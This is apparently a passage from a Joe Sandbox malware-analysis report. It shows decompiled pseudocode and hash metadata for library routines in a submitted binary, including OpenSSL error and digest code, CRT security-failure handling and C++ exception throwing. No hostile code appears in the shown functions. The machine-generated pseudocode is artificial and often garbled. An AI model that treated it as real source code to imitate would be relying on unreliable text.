                                                                                    								L26:
                                                                                    								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
                                                                                    								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
                                                                                    								__eflags = _t76;
                                                                                    								if(_t76 != 0) {
                                                                                    									_t113 = _a16;
                                                                                    									__eflags = _t101 - _t113;
                                                                                    									if(_t101 >= _t113) {
                                                                                    										_t107 = _a4;
                                                                                    									} else {
                                                                                    										_t82 =  *((intOrPtr*)(_t142 + 0x14));
                                                                                    										__eflags = _t82 - 8;
                                                                                    										if(_t82 < 8) {
                                                                                    											_t125 = _t142;
                                                                                    										} else {
                                                                                    											_t125 =  *_t142;
                                                                                    										}
                                                                                    										__eflags = _t82 - 8;
                                                                                    										if(_t82 < 8) {
                                                                                    											_a12 = _t142;
                                                                                    										} else {
                                                                                    											_a12 =  *_t142;
                                                                                    										}
                                                                                    										_t107 = _a4;
                                                                                    										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
                                                                                    										_t113 = _a16;
                                                                                    										_t151 = _t151 + 4;
                                                                                    									}
                                                                                    									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
                                                                                    									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
                                                                                    										_t124 = _t142;
                                                                                    									} else {
                                                                                    										_t124 =  *_t142;
                                                                                    									}
                                                                                    									__eflags = _t113;
                                                                                    									if(_t113 != 0) {
                                                                                    										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
                                                                                    									}
                                                                                    									E00414DF0(_t142, _a8);
                                                                                    								}
                                                                                    							} else {
                                                                                    								__eflags = _t101;
                                                                                    								if(_t101 != 0) {
                                                                                    									goto L26;
                                                                                    								}
                                                                                    							}
                                                                                    							return _t142;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t118 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                    					if(_t118 < 8) {
                                                                                    						_t96 = __ecx;
                                                                                    					} else {
                                                                                    						_t96 =  *__ecx;
                                                                                    					}
                                                                                    					if(_t130 < _t96) {
                                                                                    						goto L13;
                                                                                    					} else {
                                                                                    						if(_t118 < 8) {
                                                                                    							_t128 = _t142;
                                                                                    						} else {
                                                                                    							_t128 =  *_t142;
                                                                                    						}
                                                                                    						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
                                                                                    							goto L13;
                                                                                    						} else {
                                                                                    							if(_t118 < 8) {
                                                                                    								_t99 = _t142;
                                                                                    							} else {
                                                                                    								_t99 =  *_t142;
                                                                                    							}
                                                                                    							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x00417ea6
                                                                                    0x00417e65
                                                                                    0x00417e65
                                                                                    0x00417e68
                                                                                    0x00417e6b
                                                                                    0x00417e71
                                                                                    0x00417e6d
                                                                                    0x00417e6d
                                                                                    0x00417e6d
                                                                                    0x00417e73
                                                                                    0x00417e76
                                                                                    0x00417e7f
                                                                                    0x00417e78
                                                                                    0x00417e7a
                                                                                    0x00417e7a
                                                                                    0x00417e8a
                                                                                    0x00417e99
                                                                                    0x00417e9e
                                                                                    0x00417ea1
                                                                                    0x00417ea1
                                                                                    0x00417ea9
                                                                                    0x00417ead
                                                                                    0x00417eb3
                                                                                    0x00417eaf
                                                                                    0x00417eaf
                                                                                    0x00417eaf
                                                                                    0x00417eb5
                                                                                    0x00417eb7
                                                                                    0x00417ec2
                                                                                    0x00417ec7
                                                                                    0x00417ecf
                                                                                    0x00417ecf
                                                                                    0x00417e40
                                                                                    0x00417e40
                                                                                    0x00417e42
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00417e42
                                                                                    0x00417edc
                                                                                    0x00417edc
                                                                                    0x00417ddc
                                                                                    0x00417d61
                                                                                    0x00417d61
                                                                                    0x00417d67
                                                                                    0x00417d6d
                                                                                    0x00417d69
                                                                                    0x00417d69
                                                                                    0x00417d69
                                                                                    0x00417d71
                                                                                    0x00000000
                                                                                    0x00417d73
                                                                                    0x00417d76
                                                                                    0x00417d7c
                                                                                    0x00417d78
                                                                                    0x00417d78
                                                                                    0x00417d78
                                                                                    0x00417d86
                                                                                    0x00000000
                                                                                    0x00417d88
                                                                                    0x00417d8b
                                                                                    0x00417d91
                                                                                    0x00417d8d
                                                                                    0x00417d8d
                                                                                    0x00417d8d
                                                                                    0x00417dae
                                                                                    0x00417dae
                                                                                    0x00417d86
                                                                                    0x00417d71

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 4104443479-4289949731
                                                                                    • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                    • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                    • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                    • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E004516A0(void* __ebx, void* __edi) {
                                                                                    				char* _t6;
                                                                                    				intOrPtr _t12;
                                                                                    				void* _t14;
                                                                                    				char* _t16;
                                                                                    				char** _t19;
                                                                                    				void* _t21;
                                                                                    				void* _t22;
                                                                                    				void* _t23;
                                                                                    
                                                                                    				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
                                                                                    				_t22 = _t21 + 0x10;
                                                                                    				if( *0x50b6d4 != 0) {
                                                                                    					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
                                                                                    					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
                                                                                    					_t23 = _t22 + 0x20;
                                                                                    					__eflags =  *0x50b6d4;
                                                                                    					if( *0x50b6d4 != 0) {
                                                                                    						_push(__ebx);
                                                                                    						_push(__edi);
                                                                                    						_t12 = 1;
                                                                                    						_t16 = 0x5117e0;
                                                                                    						_t19 = 0x5113e4;
                                                                                    						do {
                                                                                    							__eflags =  *_t19;
                                                                                    							 *((intOrPtr*)(_t19 - 4)) = _t12;
                                                                                    							if(__eflags == 0) {
                                                                                    								_push(_t12);
                                                                                    								_t6 = E004C5D39(_t12, _t14, __eflags);
                                                                                    								_t23 = _t23 + 4;
                                                                                    								__eflags = _t6;
                                                                                    								if(_t6 != 0) {
                                                                                    									E004C5E00(_t16, _t6, 0x20);
                                                                                    									_t23 = _t23 + 0xc;
                                                                                    									_t16[0x1f] = 0;
                                                                                    									 *_t19 = _t16;
                                                                                    								}
                                                                                    								__eflags =  *_t19;
                                                                                    								if( *_t19 == 0) {
                                                                                    									 *_t19 = "unknown";
                                                                                    								}
                                                                                    							}
                                                                                    							_t19 =  &(_t19[2]);
                                                                                    							_t12 = _t12 + 1;
                                                                                    							_t16 =  &(_t16[0x20]);
                                                                                    							__eflags = _t19 - 0x5117d4;
                                                                                    						} while (_t19 <= 0x5117d4);
                                                                                    						 *0x50b6d4 = 0;
                                                                                    						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
                                                                                    					} else {
                                                                                    						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
                                                                                    					}
                                                                                    				} else {
                                                                                    					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
                                                                                    				}
                                                                                    			}












                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .\crypto\err\err.c$unknown
                                                                                    • API String ID: 0-565200744
                                                                                    • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                    • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                    • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                    • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 88%
                                                                                    			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                    				intOrPtr _v0;
                                                                                    				void* _v808;
                                                                                    				int _t9;
                                                                                    				intOrPtr _t14;
                                                                                    				signed int _t15;
                                                                                    				signed int _t17;
                                                                                    				signed int _t19;
                                                                                    				intOrPtr _t22;
                                                                                    				intOrPtr _t23;
                                                                                    				intOrPtr _t24;
                                                                                    				intOrPtr _t25;
                                                                                    				intOrPtr _t26;
                                                                                    				intOrPtr _t27;
                                                                                    				intOrPtr _t28;
                                                                                    				intOrPtr* _t30;
                                                                                    				intOrPtr* _t32;
                                                                                    				void* _t35;
                                                                                    
                                                                                    				_t28 = __esi;
                                                                                    				_t27 = __edi;
                                                                                    				_t26 = __edx;
                                                                                    				_t23 = __ecx;
                                                                                    				_t22 = __ebx;
                                                                                    				_t35 = _t23 -  *0x50ad20; // 0x84f4da2
                                                                                    				if(_t35 == 0) {
                                                                                    					asm("repe ret");
                                                                                    				}
                                                                                    				_t30 = _t32;
                                                                                    				_t9 = IsProcessorFeaturePresent(0x17);
                                                                                    				if(_t9 != 0) {
                                                                                    					_t23 = 2;
                                                                                    					asm("int 0x29");
                                                                                    				}
                                                                                    				 *0x510e38 = _t9;
                                                                                    				 *0x510e34 = _t23;
                                                                                    				 *0x510e30 = _t26;
                                                                                    				 *0x510e2c = _t22;
                                                                                    				 *0x510e28 = _t28;
                                                                                    				 *0x510e24 = _t27;
                                                                                    				 *0x510e50 = ss;
                                                                                    				 *0x510e44 = cs;
                                                                                    				 *0x510e20 = ds;
                                                                                    				 *0x510e1c = es;
                                                                                    				 *0x510e18 = fs;
                                                                                    				 *0x510e14 = gs;
                                                                                    				asm("pushfd");
                                                                                    				_pop( *0x510e48);
                                                                                    				 *0x510e3c =  *_t30;
                                                                                    				 *0x510e40 = _v0;
                                                                                    				 *0x510e4c =  &_a4;
                                                                                    				 *0x510d88 = 0x10001;
                                                                                    				_t14 =  *0x510e40; // 0x0
                                                                                    				 *0x510d44 = _t14;
                                                                                    				 *0x510d38 = 0xc0000409;
                                                                                    				 *0x510d3c = 1;
                                                                                    				 *0x510d48 = 1;
                                                                                    				_t15 = 4;
                                                                                    				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
                                                                                    				_t17 = 4;
                                                                                    				_t24 =  *0x50ad20; // 0x84f4da2
                                                                                    				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                                                                                    				_t19 = 4;
                                                                                    				_t25 =  *0x50ad24; // 0xf7b0b25d
                                                                                    				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                                                                                    				return E0042AB4B(_t19 << 0, "8\rQ");
                                                                                    			}





















                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                    • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: 8Q
                                                                                    • API String ID: 3761405300-2096853525
                                                                                    • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                    • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                    • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                    • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 52%
                                                                                    			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
                                                                                    				intOrPtr _t14;
                                                                                    				intOrPtr _t15;
                                                                                    				intOrPtr* _t18;
                                                                                    				void* _t20;
                                                                                    				intOrPtr _t22;
                                                                                    				intOrPtr* _t25;
                                                                                    				intOrPtr* _t27;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_t18 = __ecx;
                                                                                    				_t25 = __ecx;
                                                                                    				_push(__edi);
                                                                                    				_t22 = _a4;
                                                                                    				 *__ecx = 0;
                                                                                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                                                                                    				if(_t22 == 0) {
                                                                                    					L4:
                                                                                    					return _t25;
                                                                                    				} else {
                                                                                    					_t36 = _t22 - 0xffffffff;
                                                                                    					if(_t22 > 0xffffffff) {
                                                                                    						_push("vector<T> too long");
                                                                                    						E0044F23E(__eflags);
                                                                                    						goto L6;
                                                                                    					} else {
                                                                                    						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
                                                                                    						_t32 = _t32 + 4;
                                                                                    						if(_t15 == 0) {
                                                                                    							L6:
                                                                                    							E0044F1BB(__eflags);
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							_push(_t25);
                                                                                    							_t27 = _t18;
                                                                                    							_t14 =  *_t27;
                                                                                    							__eflags = _t14;
                                                                                    							if(_t14 != 0) {
                                                                                    								_t14 = L00422587(_t14);
                                                                                    								 *_t27 = 0;
                                                                                    								 *((intOrPtr*)(_t27 + 4)) = 0;
                                                                                    								 *((intOrPtr*)(_t27 + 8)) = 0;
                                                                                    							}
                                                                                    							return _t14;
                                                                                    						} else {
                                                                                    							 *_t25 = _t15;
                                                                                    							 *((intOrPtr*)(_t25 + 4)) = _t15;
                                                                                    							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
                                                                                    							E0042B420(_t15, 0, _t22);
                                                                                    							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
                                                                                    							goto L4;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}












                                                                                    APIs
                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                    • _memset.LIBCMT ref: 00413C83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                    • String ID: vector<T> too long
                                                                                    • API String ID: 1327501947-3788999226
                                                                                    • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                    • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                    • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                    • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t10;
                                                                                    				void* _t13;
                                                                                    				intOrPtr* _t15;
                                                                                    				intOrPtr* _t26;
                                                                                    				void* _t27;
                                                                                    				void* _t28;
                                                                                    				intOrPtr* _t29;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_t29 = _a4;
                                                                                    				_t10 =  *_t29;
                                                                                    				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
                                                                                    				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
                                                                                    					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
                                                                                    					_t31 = _t31 + 0xc;
                                                                                    				}
                                                                                    				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
                                                                                    				_t26 = _a12;
                                                                                    				_t32 = _t31 + 8;
                                                                                    				_t28 = _t13;
                                                                                    				if(_t26 != 0) {
                                                                                    					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
                                                                                    				}
                                                                                    				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
                                                                                    				if(_t15 != 0) {
                                                                                    					 *_t15(_t29);
                                                                                    					E0047D100(_t29, 2);
                                                                                    					_t32 = _t32 + 0xc;
                                                                                    				}
                                                                                    				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
                                                                                    				return _t28;
                                                                                    			}















                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00480686
                                                                                      • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                    Strings
                                                                                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                    • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset_raise
                                                                                    • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                    • API String ID: 1484197835-3867593797
                                                                                    • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                    • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                    • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                    • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
                                                                                    • __invoke_watson.LIBCMT ref: 004242CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DecodePointer__invoke_watson
                                                                                    • String ID: i;B
                                                                                    • API String ID: 4034010525-472376889
                                                                                    • Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                    • Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
                                                                                    • Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                    • Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 58%
                                                                                    			E0044F23E(void* __eflags, char _a4) {
                                                                                    				char _v12;
                                                                                    				char _v16;
                                                                                    				char _v32;
                                                                                    				char _v40;
                                                                                    				char _v60;
                                                                                    				intOrPtr _v68;
                                                                                    				char _v92;
                                                                                    				char _v100;
                                                                                    				char _v120;
                                                                                    				void* _t58;
                                                                                    				void* _t63;
                                                                                    				void* _t64;
                                                                                    				void* _t65;
                                                                                    
                                                                                    				_t58 = _t63;
                                                                                    				_t64 = _t63 - 0xc;
                                                                                    				E00430CFC( &_v16,  &_a4);
                                                                                    				_v16 = 0x4d6554;
                                                                                    				E00430ECA( &_v16, 0x5081fc);
                                                                                    				asm("int3");
                                                                                    				_push(_t58);
                                                                                    				_t65 = _t64 - 0xc;
                                                                                    				E00430CFC( &_v32,  &_v12);
                                                                                    				_v32 = 0x4d6560;
                                                                                    				E00430ECA( &_v32, 0x508238);
                                                                                    				asm("int3");
                                                                                    				_push(_t64);
                                                                                    				E00430CFC( &_v60,  &_v40);
                                                                                    				_v60 = 0x4d6578;
                                                                                    				E00430ECA( &_v60, 0x508274);
                                                                                    				asm("int3");
                                                                                    				_push(_t65);
                                                                                    				E0044EF74( &_v92, _v68);
                                                                                    				E00430ECA( &_v92, 0x508320);
                                                                                    				asm("int3");
                                                                                    				_push(_t65 - 0xc);
                                                                                    				E00430CFC( &_v120,  &_v100);
                                                                                    				_v120 = 0x4d656c;
                                                                                    				E00430ECA( &_v120, 0x5082cc);
                                                                                    				asm("int3");
                                                                                    				return "bad function call";
                                                                                    			}

















                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 0044F251
                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                    • String ID: TeM
                                                                                    • API String ID: 757275642-2215902641
                                                                                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                    • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                    • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%